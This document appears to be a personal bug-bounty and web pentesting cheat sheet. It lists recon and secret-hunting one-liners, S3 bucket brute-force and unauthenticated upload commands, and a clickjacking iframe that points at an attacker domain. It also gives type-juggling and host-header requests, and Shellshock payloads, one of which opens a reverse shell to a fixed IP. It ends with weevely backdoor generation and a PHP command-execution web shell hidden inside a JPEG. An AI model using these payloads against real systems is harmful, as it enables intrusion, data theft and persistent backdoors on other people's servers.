Recon
- Enumerate Domains.
- Enumerate Subdomains: recon.sh + httpx or Knockpy -w subdomains $domain.com.
- Enumerate Params: gau, waybackurls, paramspider and dirsearch.
- Enumerate ports of each subdomain: nmap.
- API KEYS - cat url.txt | grep ".js" xargs -I@ sh -c 'python.exe SecretFinder.py -i @ -e -o cli' | tee apiKeys.txt
- Maltego + FOCA.
- Google Dorks.
- Frameworks, Languages, PaaS and Servers.
- Shodan to know cves exposure
Recon searching for:
Requests:
- setRequestHeader
- XMLHttpRequest
- $.ajax
- $.get
- $.post
- $.getJSON
- fetch(
- axios({
- Url = "http
FIREBASE:
firebaseio.com/.json
Cookies:
- set_cookie(
- base64
S3 Buckets
- s3.amazonaws.com
- Read: aws s3 ls s3://domain --no-sign-request = Response: An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist
- Upload: aws s3 cp poc.html s3://domain --no-sign-request = load to s3://
- Bruteforce: cat subdomains.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request' | grep -v 'An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist'
API Tokens:
- pk_live
- sk_live
- AIza
JWT
The Json web tokens cannot be tested in automated ways, so it is more likely to meet some bugs.
Open Redirect
Use "Burp Seach"
?redirection=
?redir=
?redireccion=
Clickjacking
List forms to change password, email and delete account via GET Request + Submit input.
<iframe src="$url?email=hacker@attacker-website.com"></iframe>
Type Juggling
POST https://example.com/login.php HTTP/1.1
Accept: */*
Content-Type: application/json
usuario=admin&password[]=anything
Add [] to password
Shellshock Attack
cgi-bin/stats
POST https://example.com/session.cgi HTTP/1.1
Accept: */*
User-Agent: () { :; }; echo "pwned"
User-Agent: () { :; }; echo "pwned"
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
curl -s -X GET "http://localhost/cgi-bin/stats" -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/10.10.14.29/443 0>&1"
echo to bypass WAF
CRLF
Always test params with GET Requests: https://github.com/AngelJuanMa/Web-Vulnerabilities/blob/main/Payloads/CRLF.txt
Google Dorks
python3.9 pagodo.py -d example.com -g ./dorks/all_google_dorks.txt
cat pagodo.py.log | grep 'Found unique URL #'
4.2 days to finish
Host Header Atttack
POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: SUBDOMAIN.burpcollaborator.net
Subdomain Takeover
https://github.com/EdOverflow/can-i-take-over-xyz
Api keys
https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/keyhacks-api.md
Graphql
InQL extension of burp suite to list endpoints.
WAF bypass
sudo apt install jq
git clone https://github.com/vincentcox/bypass-firewalls-by-DNS-history
cd bypass-firewalls-by-DNS-history/
bash bypass-firewalls-by-DNS-history.sh --help
https://github.com/EnableSecurity/wafw00f
Backdoor
weevely generate 12345 404.php
weevely http://domain.com/404.php 12345
jhead -purejpg ns.jpg
jhead -ce ns.jpg
mv ns.jpg ns.php.jpg
Insert:
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1>
<?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="foto.jpg" border=0>
';}__halt_compiler();?></h1>
:wq